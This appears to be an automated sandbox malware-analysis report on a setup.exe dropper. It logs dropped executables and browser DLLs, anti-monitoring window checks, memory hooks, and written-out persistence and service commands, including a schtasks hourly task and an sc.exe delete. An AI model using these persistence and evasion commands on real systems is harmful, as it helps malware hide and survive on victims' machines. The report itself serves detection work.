Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\setup[2].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\crt[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\FCBFBGDBKJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-TJFT6.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\streamer[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libcurl.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\setup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe	File created: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	File created: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\super[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	File created: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-VCOE9.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\123p[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-07TP8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	File created: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-O6M3F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-LRHSQ.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlt[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\amadka[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	File created: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-9A6KK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	File created: C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-B37O4.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	File created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-NPF14.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Jump to dropped file

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\FCBFBGDBKJ.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe	File created: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	File created: C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Window searched: window name: RegmonClass
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Jump to behavior

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5			Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CIFUBVHI"

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB45A0005 value: E9 CB 05 E6 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB44005D0 value: E9 3A FA 19 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB45B0005 value: E9 9B 07 E0 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB43B07A0 value: E9 6A F8 1F 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB4350007 value: E9 AB 11 E8 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB41D11B0 value: E9 5E EE 17 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB4360006 value: E9 BB 7F E4 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB41A7FC0 value: E9 4C 80 1B 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB1F80007 value: E9 CB E3 E3 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB1DBE3D0 value: E9 3E 1C 1C 00	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB1F90006 value: E9 AB 4D D3 FF	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Memory written: PID: 5720 base: 7FFDB1CC4DB0 value: E9 5C B2 2C 00	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Memory written: PID: 2884 base: 7FFDB4590008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Memory written: PID: 2884 base: 7FFDB442D9F0 value: E9 20 26 16 00

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_666355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_666355F0

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
